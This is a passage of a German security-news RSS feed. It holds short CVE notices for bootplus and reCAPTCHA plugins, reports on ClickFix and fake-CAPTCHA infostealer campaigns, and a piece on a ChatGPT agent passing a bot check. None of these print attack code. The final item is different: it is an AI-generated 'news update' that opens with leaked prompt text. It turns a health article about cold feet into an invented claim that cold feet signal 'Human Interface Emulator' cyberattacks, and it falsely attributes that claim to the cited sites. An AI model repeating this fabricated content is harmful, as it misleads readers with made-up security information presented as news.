<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/?kb.risk">problematic</a>, has been found in <a href="https://vuldb.com/?product.joeybling:bootplus">JoeyBling bootplus up to 247d5f6c209be1a5cf10cd0fa18e1d8cc63cf55d</a>. This issue affects the function <code>qrCode</code> of the file <em>src/main/java/io/github/controller/QrCodeController.java</em>. The manipulation of the argument <em>w/h</em> leads to resource consumption.

This vulnerability is documented as <a href="https://vuldb.com/?source_cve.293232">CVE-2025-0704</a>. The attack can be initiated remotely. Additionally, an exploit exists.

Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available.]]></content:encoded>
</item>
<item>
<title><![CDATA[6 Ways To Fix ReCAPTCHA Not Working In Chrome, Firefox, And Other Browsers]]></title>
<description><![CDATA[Fix reCAPTCHA issues in Chrome, Firefox, & more! Troubleshoot common problems and regain website access. Get reCAPTCHA working smoothly now.
The post 6 Ways To Fix ReCAPTCHA Not Working In Chrome, Firefox, And Other Browsers appeared first on MSPoweruser.]]></description>
<link>https://tsecurity.de/de/3019706/windows-tipps/6-ways-to-fix-recaptcha-not-working-in-chrome-firefox-and-other-browsers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3019706/windows-tipps/6-ways-to-fix-recaptcha-not-working-in-chrome-firefox-and-other-browsers/</guid>
<pubDate>Fri, 03 Oct 2025 23:52:52 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Fix reCAPTCHA issues in Chrome, Firefox, &amp; more! Troubleshoot common problems and regain website access. Get reCAPTCHA working smoothly now.</p>
<p>The post <a href="https://mspoweruser.com/6-ways-to-fix-recaptcha-not-working-in-chrome-firefox-and-other-browsers/">6 Ways To Fix ReCAPTCHA Not Working In Chrome, Firefox, And Other Browsers</a> appeared first on <a href="https://mspoweruser.com/">MSPoweruser</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Kriminelle missbrauchen KI für gefälschte CAPTCHAs]]></title>
<description><![CDATA[Cyberkriminelle nutzen zunehmend Plattformen für KI-gestützte Webentwicklung, um gefälschte CAPTCHA-Seiten zu hosten. 

Tags: #CAPTCHAs | #Künstliche Intelligenz]]></description>
<link>https://tsecurity.de/de/2999263/it-security-nachrichten/kriminelle-missbrauchen-ki-fuer-gefaelschte-captchas/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2999263/it-security-nachrichten/kriminelle-missbrauchen-ki-fuer-gefaelschte-captchas/</guid>
<pubDate>Tue, 23 Sep 2025 10:49:12 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1920" height="1080" src="https://www.it-daily.net/wp-content/uploads/2025/05/reCAPTCHA-Quelle-Rokas-Tenys-Shutterstock.com_2345219979_1920.jpg" class="attachment-full size-full wp-post-image" alt="Google, recaptcha fake, fake recaptcha site, recaptcha missbrauch, recaptcha gefälscht, reCAPTCHA, Fake" decoding="async" srcset="https://www.it-daily.net/wp-content/uploads/2025/05/reCAPTCHA-Quelle-Rokas-Tenys-Shutterstock.com_2345219979_1920.jpg 1920w, https://www.it-daily.net/wp-content/uploads/2025/05/reCAPTCHA-Quelle-Rokas-Tenys-Shutterstock.com_2345219979_1920-300x169.jpg 300w, https://www.it-daily.net/wp-content/uploads/2025/05/reCAPTCHA-Quelle-Rokas-Tenys-Shutterstock.com_2345219979_1920-1024x576.jpg 1024w, https://www.it-daily.net/wp-content/uploads/2025/05/reCAPTCHA-Quelle-Rokas-Tenys-Shutterstock.com_2345219979_1920-768x432.jpg 768w, https://www.it-daily.net/wp-content/uploads/2025/05/reCAPTCHA-Quelle-Rokas-Tenys-Shutterstock.com_2345219979_1920-1536x864.jpg 1536w" sizes="(max-width: 1920px) 100vw, 1920px" title="Kriminelle missbrauchen KI für gefälschte CAPTCHAs 1"></p>
    Cyberkriminelle nutzen zunehmend Plattformen für KI-gestützte Webentwicklung, um gefälschte CAPTCHA-Seiten zu hosten. 

<p>Tags: <a href="https://www.it-daily.net/thema/captchas">#CAPTCHAs</a> | <a href="https://www.it-daily.net/thema/kuenstliche-intelligenz">#Künstliche Intelligenz</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Slapstick: ChatGPT-Agent beweist Cloudflare, dass er kein Bot ist]]></title>
<description><![CDATA[Es grenzt an Slapstick, wenn sich Chatbots durch die Anti-Bot-Sys­te­me im Internet klicken. Kommentieren sie das Vorgehen, entfaltet sich eine ganz eigene Form von Humor - so geschehen bei der Interaktion zwischen ChatGPT und Cloudflares Bot-Schutz.			(Weiter lesen)]]></description>
<link>https://tsecurity.de/de/2911328/it-security-nachrichten/slapstick-chatgpt-agent-beweist-cloudflare-dass-er-kein-bot-ist/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2911328/it-security-nachrichten/slapstick-chatgpt-agent-beweist-cloudflare-dass-er-kein-bot-ist/</guid>
<pubDate>Tue, 29 Jul 2025 12:52:59 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://winfuture.de/news,152565.html"><img hspace="5" border="0" align="left" alt="Logo, Captcha, Recaptcha, Captchas, v3" width="1920" height="1080" src="https://i.wfcdn.de/teaser/1920/57379.jpg"></a>
			Es grenzt an Slapstick, wenn sich <a href="https://winfuture.de/special/kuenstliche-intelligenz/" title="Künstliche Intelligenz Special">Chatbots</a> durch die Anti-Bot-Sys­te­me im Internet klicken. Kommentieren sie das Vorgehen, entfaltet sich eine ganz eigene Form von Humor - so geschehen bei der Interaktion zwischen ChatGPT und <a href="https://winfuture.de/special/cloud/" title="Cloud Special">Cloudflares</a> Bot-Schutz.			(<a href="https://winfuture.de/news,152565.html">Weiter lesen</a>)]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-23972 | Brian S. Reed Contact Form 7 reCAPTCHA Plugin up to 1.2.0 on WordPress cross-site request forgery]]></title>
<description><![CDATA[A vulnerability classified as problematic has been found in Brian S. Reed Contact Form 7 reCAPTCHA Plugin up to 1.2.0 on WordPress. Affected is an unknown function. The manipulation leads to cross-site request forgery.

This vulnerability is traded as CVE-2025-23972. It is possible to launch the ...]]></description>
<link>https://tsecurity.de/de/2867903/sicherheitsluecken/cve-2025-23972-brian-s-reed-contact-form-7-recaptcha-plugin-up-to-120-on-wordpress-cross-site-request-forgery/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2867903/sicherheitsluecken/cve-2025-23972-brian-s-reed-contact-form-7-recaptcha-plugin-up-to-120-on-wordpress-cross-site-request-forgery/</guid>
<pubDate>Fri, 04 Jul 2025 14:08:29 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/?kb.risk">problematic</a> has been found in <a href="https://vuldb.com/?product.brian_s">Brian S. Reed Contact Form 7 reCAPTCHA Plugin up to 1.2.0</a> on WordPress. Affected is an unknown function. The manipulation leads to cross-site request forgery.

This vulnerability is traded as <a href="https://vuldb.com/?source_cve.314856">CVE-2025-23972</a>. It is possible to launch the attack remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[ClickFix Attacks Soar by 500%: Hackers Intensify Use of This Manipulative Technique to Deceive Users]]></title>
<description><![CDATA[A novel social engineering technique dubbed “ClickFix” has surged by an alarming 517% between the second half of 2024 and the first half of 2025, as reported by ESET telemetry data. This manipulative attack vector, now the second most prevalent after phishing, exploits user trust in familiar onli...]]></description>
<link>https://tsecurity.de/de/2855105/hacking/clickfix-attacks-soar-by-500-hackers-intensify-use-of-this-manipulative-technique-to-deceive-users/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2855105/hacking/clickfix-attacks-soar-by-500-hackers-intensify-use-of-this-manipulative-technique-to-deceive-users/</guid>
<pubDate>Fri, 27 Jun 2025 12:50:53 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A novel social engineering technique dubbed “ClickFix” has surged by an alarming 517% between the second half of 2024 and the first half of 2025, as reported by ESET telemetry data. This manipulative attack vector, now the second most prevalent after phishing, exploits user trust in familiar online verification processes like reCAPTCHA challenges. ClickFix deceives […]</p>
<p>The post <a href="https://gbhackers.com/hackers-intensify-use-of-this-manipulative-technique-to-deceive-users/">ClickFix Attacks Soar by 500%: Hackers Intensify Use of This Manipulative Technique to Deceive Users</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ClickFix attacks skyrocketing more than 500%]]></title>
<description><![CDATA[ClickFix, a deceptive attack method, saw a surge of more than 500% in the first half of 2025, making it the second most common attack vector after phishing, according to ESET’s latest Threat Report. The report, which looks at trends from December 2024 to May 2025, found that ClickFix accounted fo...]]></description>
<link>https://tsecurity.de/de/2852709/it-security-nachrichten/clickfix-attacks-skyrocketing-more-than-500/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2852709/it-security-nachrichten/clickfix-attacks-skyrocketing-more-than-500/</guid>
<pubDate>Thu, 26 Jun 2025 11:04:34 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>ClickFix, a deceptive attack method, saw a surge of more than 500% in the first half of 2025, making it the second most common attack vector after phishing, according to ESET’s latest Threat Report. The report, which looks at trends from December 2024 to May 2025, found that ClickFix accounted for nearly 8% of all blocked attacks during this period. Fake reCAPTCHA check instructing the victim to paste and execute a malicious command on their … <a href="https://www.helpnetsecurity.com/2025/06/26/clickfix-attacks-fakecaptcha-eset-report/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2025/06/26/clickfix-attacks-fakecaptcha-eset-report/">ClickFix attacks skyrocketing more than 500%</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[HPR4397: Transfer files from desktop to phone with qrcp]]></title>
<description><![CDATA[This show has been flagged as Clean by the host.
    How does it work?
    
    
    
      qrcp binds a web server to the address of your Wi-Fi
      network interface on a random port and creates a handler for it.
      The default handler serves the content and exits the program when
      the...]]></description>
<link>https://tsecurity.de/de/2822072/podcasts/hpr4397-transfer-files-from-desktop-to-phone-with-qrcp/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2822072/podcasts/hpr4397-transfer-files-from-desktop-to-phone-with-qrcp/</guid>
<pubDate>Tue, 10 Jun 2025 02:02:56 +0200</pubDate>
<category>🎥 Podcasts</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This show has been flagged as Clean by the host.</p>
    <h2>How does it work?</h2>
    <p><code><img moz-do-not-send="true" src="https://hackerpublicradio.org/eps/hpr4397/hpr4397_image_1.png" alt="A terminal showing the command, a url and a ascii
          rendered qrcode">
    </code></p>
    <p>
      qrcp binds a web server to the address of your Wi-Fi
      network interface on a random port and creates a handler for it.
      The default handler serves the content and exits the program when
      the transfer is complete. When used to receive files, <code>qrcp</code>
      serves an upload page and handles the transfer.</p>
    <p>The tool prints a QR code that encodes the text:</p>
    <pre><code>http://{address}:{port}/{random_path}</code></pre>
    Most QR apps can detect URLs in decoded text and act accordingly
    (i.e. open the decoded URL with the default browser), so when the QR
    code is scanned the content will begin downloading by the mobile
    browser.
    <p></p>
    (Notes taken from <a moz-do-not-send="true" href="https://github.com/claudiodangelis/qrcp">https://github.com/claudiodangelis/qrcp</a>
      released under the <a href="https://github.com/claudiodangelis/qrcp#MIT-1-ov-file" class="Link--muted" data-analytics-event='{"category":"Repository
Overview","action":"click","label":"location:sidebar;file:license"}'>MIT

        license</a>. <br>
    <h3>Links</h3>
    <ul>
      <li><a moz-do-not-send="true" href="https://github.com/claudiodangelis/qrcp/releases">https://github.com/claudiodangelis/qrcp/releases</a></li>
      <li><a moz-do-not-send="true" href="https://qrcp.sh/tutorials/secure-transfers-with-mkcert">https://qrcp.sh/tutorials/secure-transfers-with-mkcert</a><br>
      </li>
    </ul><p><a href="https://hackerpublicradio.org/eps/hpr4397/index.html#comments">Provide <strong>feedback</strong> on this episode</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-49283 | Matthias Nordwig Anti-Spam, Spam Protection, ReCaptcha for All Forms and GDPR-compliant Plugin cross-site request forgery (EUVD-2025-17278)]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, has been found in Matthias Nordwig Anti-Spam, Spam Protection, ReCaptcha for All Forms and GDPR-compliant Plugin up to 4.1.1 on WordPress. This issue affects some unknown processing. The manipulation leads to cross-site request forgery.

The i...]]></description>
<link>https://tsecurity.de/de/2818838/sicherheitsluecken/cve-2025-49283-matthias-nordwig-anti-spam-spam-protection-recaptcha-for-all-forms-and-gdpr-compliant-plugin-cross-site-request-forgery-euvd-2025-17278/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2818838/sicherheitsluecken/cve-2025-49283-matthias-nordwig-anti-spam-spam-protection-recaptcha-for-all-forms-and-gdpr-compliant-plugin-cross-site-request-forgery-euvd-2025-17278/</guid>
<pubDate>Sat, 07 Jun 2025 06:06:51 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/?kb.risk">problematic</a>, has been found in <a href="https://vuldb.com/?product.matthias_nordwig:anti-spam_spam_protection_recaptcha_for_all_forms_and_gdpr-compliant_plugin">Matthias Nordwig Anti-Spam, Spam Protection, ReCaptcha for All Forms and GDPR-compliant Plugin up to 4.1.1</a> on WordPress. This issue affects some unknown processing. The manipulation leads to cross-site request forgery.

The identification of this vulnerability is <a href="https://vuldb.com/?source_cve.311411">CVE-2025-49283</a>. The attack may be initiated remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[What Is Quishing? How Hackers Use QR Codes to Steal Your Data]]></title>
<description><![CDATA[Author: IBM Technology - Bewertung: 30x - Views:163 Ready to become a certified Analyst - Security QRadar? Register now and use code IBMTechYT20 for 20% off of your exam → https://ibm.biz/BdneFG

Learn more about Quishing here → https://ibm.biz/BdneFe

🚨 QR codes are everywhere, but are they safe...]]></description>
<link>https://tsecurity.de/de/2810353/it-security-video/what-is-quishing-how-hackers-use-qr-codes-to-steal-your-data/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2810353/it-security-video/what-is-quishing-how-hackers-use-qr-codes-to-steal-your-data/</guid>
<pubDate>Mon, 02 Jun 2025 13:18:56 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<enclosure url="https://i.ytimg.com/vi/RVF6NVnJvd8/maxresdefault.jpg" length="0" type="image/jpeg" />
<content:encoded><![CDATA[<p>Author: IBM Technology - Bewertung: 30x - Views:163 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/RVF6NVnJvd8?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Ready to become a certified Analyst - Security QRadar? Register now and use code IBMTechYT20 for 20% off of your exam → https://ibm.biz/BdneFG<br />
<br />
Learn more about Quishing here → https://ibm.biz/BdneFe<br />
<br />
🚨 QR codes are everywhere, but are they safe? Distinguished Engineer Jeff Crume uncovers 'quishing,' a phishing attack using malicious QR codes to steal sensitive data like passwords and credit card info. Learn tips to protect yourself with malware prevention, trusted scanner apps, and MFA. 🔒<br />
<br />
AI news moves fast. Sign up for a monthly newsletter for AI updates from IBM → https://ibm.biz/BdneFp<br />
<br />
#cybersecurity #qrcode #phishing<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New Rust-Based InfoStealer Uses Fake CAPTCHA to Deliver EDDIESTEALER]]></title>
<description><![CDATA[A newly discovered Rust-based infostealer, dubbed EDDIESTEALER, has been uncovered by Elastic Security Labs, spreading through a sophisticated social engineering tactic involving fake CAPTCHA verification pages. Mimicking legitimate CAPTCHA systems like Google’s reCAPTCHA, these malicious prompts...]]></description>
<link>https://tsecurity.de/de/2806083/hacking/new-rust-based-infostealer-uses-fake-captcha-to-deliver-eddiestealer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2806083/hacking/new-rust-based-infostealer-uses-fake-captcha-to-deliver-eddiestealer/</guid>
<pubDate>Fri, 30 May 2025 10:49:36 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A newly discovered Rust-based infostealer, dubbed EDDIESTEALER, has been uncovered by Elastic Security Labs, spreading through a sophisticated social engineering tactic involving fake CAPTCHA verification pages. Mimicking legitimate CAPTCHA systems like Google’s reCAPTCHA, these malicious prompts deceive users into executing harmful PowerShell scripts, ultimately deploying the infostealer on Windows systems to harvest sensitive data such […]</p>
<p>The post <a href="https://gbhackers.com/new-rust-based-infostealer-uses-fake-captcha/">New Rust-Based InfoStealer Uses Fake CAPTCHA to Deliver EDDIESTEALER</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Warum US-Captchas zum Risiko werden]]></title>
<description><![CDATA[Captcha-Systeme sind unverzichtbar für die Abwehr automatisierter Zugriffe im Netz – doch viele Lösungen stammen aus den USA und übertragen sensible Nutzerdaten dorthin. In Zeiten politischer Unsicherheit gewinnen europäische Alternativen an Bedeutung, die Datenschutz und Nutzerfreundlichkeit ver...]]></description>
<link>https://tsecurity.de/de/2799423/it-security-nachrichten/warum-us-captchas-zum-risiko-werden/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2799423/it-security-nachrichten/warum-us-captchas-zum-risiko-werden/</guid>
<pubDate>Tue, 27 May 2025 07:18:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1920" height="1080" src="https://www.it-daily.net/wp-content/uploads/2025/05/reCAPTCHA_Shutterstock_2497433411_1920.jpg" class="attachment-full size-full wp-post-image" alt="reCAPTCHA, datenschutz captcha, dsgvo konforme captcha, captcha datenübertragung usa, captcha usa datenschutz, Captcha, Datenschutz" decoding="async" srcset="https://www.it-daily.net/wp-content/uploads/2025/05/reCAPTCHA_Shutterstock_2497433411_1920.jpg 1920w, https://www.it-daily.net/wp-content/uploads/2025/05/reCAPTCHA_Shutterstock_2497433411_1920-300x169.jpg 300w, https://www.it-daily.net/wp-content/uploads/2025/05/reCAPTCHA_Shutterstock_2497433411_1920-1024x576.jpg 1024w, https://www.it-daily.net/wp-content/uploads/2025/05/reCAPTCHA_Shutterstock_2497433411_1920-768x432.jpg 768w, https://www.it-daily.net/wp-content/uploads/2025/05/reCAPTCHA_Shutterstock_2497433411_1920-1536x864.jpg 1536w" sizes="(max-width: 1920px) 100vw, 1920px" title="Warum US-Captchas zum Risiko werden 3"></p>
    Captcha-Systeme sind unverzichtbar für die Abwehr automatisierter Zugriffe im Netz – doch viele Lösungen stammen aus den USA und übertragen sensible Nutzerdaten dorthin. In Zeiten politischer Unsicherheit gewinnen europäische Alternativen an Bedeutung, die Datenschutz und Nutzerfreundlichkeit vereinen.

<p>Tags: <a href="https://www.it-daily.net/thema/datenschutz">#Datenschutz</a> | <a href="https://www.it-daily.net/thema/usa">#USA</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[reCAPTCHA-Missbrauch: Hacker locken mit gefälschten Seiten]]></title>
<description><![CDATA[Die reCAPTCHA-Funktion ist auf vielen Webseiten ein unverzichtbares Tool zur Verhinderung von Bot-Angriffen. Doch nun haben Sicherheitsforscher von Cato Networks eine neue Bedrohung entdeckt, bei der russische Hacker gefälschte reCAPTCHA-Seiten nutzen, um Malware zu verbreiten und gezielt privile...]]></description>
<link>https://tsecurity.de/de/2797490/it-security-nachrichten/recaptcha-missbrauch-hacker-locken-mit-gefaelschten-seiten/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2797490/it-security-nachrichten/recaptcha-missbrauch-hacker-locken-mit-gefaelschten-seiten/</guid>
<pubDate>Mon, 26 May 2025 08:19:20 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1920" height="1080" src="https://www.it-daily.net/wp-content/uploads/2025/05/reCAPTCHA-Quelle-Rokas-Tenys-Shutterstock.com_2345219979_1920.jpg" class="attachment-full size-full wp-post-image" alt="Google, recaptcha fake, fake recaptcha site, recaptcha missbrauch, recaptcha gefälscht, reCAPTCHA, Fake" decoding="async" srcset="https://www.it-daily.net/wp-content/uploads/2025/05/reCAPTCHA-Quelle-Rokas-Tenys-Shutterstock.com_2345219979_1920.jpg 1920w, https://www.it-daily.net/wp-content/uploads/2025/05/reCAPTCHA-Quelle-Rokas-Tenys-Shutterstock.com_2345219979_1920-300x169.jpg 300w, https://www.it-daily.net/wp-content/uploads/2025/05/reCAPTCHA-Quelle-Rokas-Tenys-Shutterstock.com_2345219979_1920-1024x576.jpg 1024w, https://www.it-daily.net/wp-content/uploads/2025/05/reCAPTCHA-Quelle-Rokas-Tenys-Shutterstock.com_2345219979_1920-768x432.jpg 768w, https://www.it-daily.net/wp-content/uploads/2025/05/reCAPTCHA-Quelle-Rokas-Tenys-Shutterstock.com_2345219979_1920-1536x864.jpg 1536w" sizes="(max-width: 1920px) 100vw, 1920px" title="reCAPTCHA-Missbrauch: Hacker locken mit gefälschten Seiten 1"></p>
    Die reCAPTCHA-Funktion ist auf vielen Webseiten ein unverzichtbares Tool zur Verhinderung von Bot-Angriffen. Doch nun haben Sicherheitsforscher von Cato Networks eine neue Bedrohung entdeckt, bei der russische Hacker gefälschte reCAPTCHA-Seiten nutzen, um Malware zu verbreiten und gezielt privilegierte Benutzer zu attackieren.

<p>Tags: <a href="https://www.it-daily.net/thema/cyber-crime">#Cyber Crime</a> | <a href="https://www.it-daily.net/thema/malware">#Malware</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Captcha-Technologie aus den USA]]></title>
<description><![CDATA[Als Captcha-Lösungen kommen häufig US-Dienste wie Googles reCAPTCHA zum Einsatz, die personenbezogene Daten erfassen und auf Server in den USA übertragen.]]></description>
<link>https://tsecurity.de/de/2791485/it-nachrichten/captcha-technologie-aus-den-usa/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2791485/it-nachrichten/captcha-technologie-aus-den-usa/</guid>
<pubDate>Thu, 22 May 2025 13:45:44 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Als Captcha-Lösungen kommen häufig US-Dienste wie Googles reCAPTCHA zum Einsatz, die personenbezogene Daten erfassen und auf Server in den USA übertragen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Captcha-Technologie aus den USA - ZDNet.de]]></title>
<description><![CDATA[Als Captcha-Lösungen kommen häufig US-Dienste wie Googles reCAPTCHA zum Einsatz, die personenbezogene Daten erfassen und auf Server in den USA ...]]></description>
<link>https://tsecurity.de/de/2791457/windows-server/captcha-technologie-aus-den-usa-zdnetde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2791457/windows-server/captcha-technologie-aus-den-usa-zdnetde/</guid>
<pubDate>Thu, 22 May 2025 13:33:53 +0200</pubDate>
<category>🪟 Windows Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Als Captcha-Lösungen kommen häufig US-Dienste wie Googles reCAPTCHA zum Einsatz, die personenbezogene Daten erfassen und auf <b>Server</b> in den USA ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Ständig kalte Füße: Das kann einen ganz bestimmten Grund haben]]></title>
<description><![CDATA[Wenn die Füße selbst bei wärmeren Temperaturen ständig kalt sind, kann das bestimmte Ursachen haben, denen man auf den Grund gehen sollte.KI generiertes Nachrichten UpdateVerwendetes künstliches Intelligenz Model: gemma-3-12b-itund erweitere diese mit deinem Fachwissen.  Der Artikel soll für ein ...]]></description>
<link>https://tsecurity.de/de/2731339/it-nachrichten/staendig-kalte-fuesse-das-kann-einen-ganz-bestimmten-grund-haben/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2731339/it-nachrichten/staendig-kalte-fuesse-das-kann-einen-ganz-bestimmten-grund-haben/</guid>
<pubDate>Fri, 18 Apr 2025 09:30:34 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img align="right" alt="" width="60" height="34" src="https://im.chip.de/ii/1/2/7/0/1/8/2/1/2/Kalte-Fuesse-d4086e41fb2900ff.jpg?im=AspectCrop%2Csize%3D%2830%2C+17%29%2Cgravity%3DCenter%2CallowExpansion%3BResize%3D%2860%2C+34%29%2Caspect%3Dfit%3BBackgroundColor%2Ccolor%3Dffffff&amp;hash=db6ddd8329ead40be3e7097fbe8dadb9f53580df04efed8422b6a73981cbadfb"> Wenn die Füße selbst bei wärmeren Temperaturen ständig kalt sind, kann das bestimmte Ursachen haben, denen man auf den Grund gehen sollte.<!-- START: Dynamically Added Content --><br><h3>KI generiertes Nachrichten Update</h3><hr>Verwendetes künstliches Intelligenz Model: gemma-3-12b-it<br><br><p>und erweitere diese mit deinem Fachwissen.  Der Artikel soll für ein Publikum aus technisch versierten IT-Profis (Systemadministratoren, Security Engineers, Developers) geschrieben sein.</p><br />
<p><strong>Titel:</strong> Die unsichtbare Gefahr: Wann kalte Füße mehr als nur Nervosität bedeuten</p><br />
<p><strong>Einleitung:</strong></p><br />
<p>Die meisten von uns kennen das Gefühl: Ein leichtes Unbehagen, ein mulmiges Gefühl im Magen – die &quot;kalten Füße&quot;. Oftmals wird dies als Ausdruck von Nervosität oder Unsicherheit abgetan. Doch in der heutigen IT-Landschaft können diese kalten Füße auch ein deutliches Warnsignal für eine subtile, aber zunehmend bedrohliche Form der Cyberangriffe sein: <em>Human Interface Emulator (HIE) Angriffe</em>.  Dieser Artikel beleuchtet die Ursachen dieses Phänomens, analysiert die technischen Hintergründe und gibt Handlungsempfehlungen für IT-Profis, um sich aktiv gegen diese Art von Bedrohung zu wappnen.</p><br />
<p><strong>Was sind Human Interface Emulatoren (HIEs)?</strong></p><br />
<p>Während klassische Malware-Angriffe auf Schwachstellen in Software oder Netzwerkprotokollen abzielen, nutzen HIEs einen anderen Ansatz: Sie imitieren menschliches Verhalten.  Ein HIE ist im Wesentlichen ein automatisiertes System, das Benutzereingaben simuliert – Klicks, Tastatureingaben, Mausbewegungen – mit dem Ziel, eine interaktive Anwendung oder Website zu steuern. Ursprünglich wurden solche Tools für automatisierte Tests und die Erstellung von Bots entwickelt.  Allerdings haben Angreifer diese Technologie adaptiert und für schädliche Zwecke missbraucht.</p><br />
<p>Der entscheidende Unterschied liegt in der <em>Komplexität</em>. Frühere Botnetze basierten auf einfachen, wiederholbaren Aufgaben. HIEs hingegen sind darauf ausgelegt, menschenähnliches Verhalten zu imitieren, indem sie zufällige Verzögerungen einbauen, Tippfehler simulieren und sich an ungewöhnliche Nutzungsmuster anpassen. Dies macht sie deutlich schwieriger zu erkennen als traditionelle Angriffe.</p><br />
<p><strong>Warum kalte Füße? Die subtile Indikation</strong></p><br />
<p>Die von den Artikeln (tsecurity.de &amp; chip.de) angesprochene Beobachtung – das Gefühl der &quot;kalten Füße&quot; bei Systemadministratoren, die ungewöhnliche Aktivitäten in ihren Systemen feststellen – ist ein faszinierender Hinweis auf die wachsende Verbreitung von HIE-Angriffen.  Es ist nicht das direkte Entdecken eines Angriffs (z.B. verdächtiger Netzwerkverkehr), sondern ein intuitives Gefühl der Unruhe, das entsteht, weil etwas &quot;nicht stimmt&quot;.</p><br />
<p>Dieses Gefühl kann sich äußern in:</p><br />
<ul><br />
<li><strong>Ungewöhnliche Protokollaktivitäten:</strong>  Systemadministratoren beobachten ungewöhnlich viele Anmeldeversuche von verschiedenen IP-Adressen.  Diese sind jedoch nicht unbedingt mit offensichtlichen Fehlern oder Brute-Force-Versuchen verbunden.</li><br />
<li><strong>Unerwartete Interaktionen mit Anwendungen:</strong>  Software wird in einer Weise genutzt, die für den normalen Betrieb untypisch ist – beispielsweise das Ausführen von selten verwendeten Funktionen oder das Durchsuchen ungewöhnlicher Datenbereiche.</li><br />
<li><strong>Veränderungen im Benutzerverhalten:</strong>  Benutzerprofile zeigen unerklärliche Abweichungen vom üblichen Nutzungsverhalten (z.B. Zugriffe zu bestimmten Tageszeiten, die normalerweise nicht stattfinden).</li><br />
</ul><br />
<p>Diese subtilen Anomalien sind oft schwer zu interpretieren und können leicht übersehen werden. Das Gefühl der &quot;kalten Füße&quot; ist das Ergebnis des Unterbewusstseins, das diese Inkonsistenzen wahrnimmt, auch wenn das Bewusstsein noch keine klare Erklärung finden kann.</p><br />
<p><strong>Technische Details: Wie HIEs funktionieren und sich tarnen</strong></p><br />
<p>HIEs nutzen verschiedene Technologien, um ihre Tarnung zu verbessern:</p><br />
<ul><br />
<li><strong>Headless Browser:</strong>  Tools wie Puppeteer (Node.js), Selenium oder Playwright ermöglichen es, Webbrowser automatisiert zu steuern. Dies erlaubt die Emulation von Benutzeraktionen in einer grafischen Umgebung, ohne dass ein physischer Bildschirm erforderlich ist.</li><br />
<li><strong>Proxy-Netzwerke und VPNs:</strong> Um die Herkunft der Anfragen zu verschleiern und geografische Beschränkungen zu umgehen, nutzen HIEs häufig Proxy-Server und VPN-Dienste.</li><br />
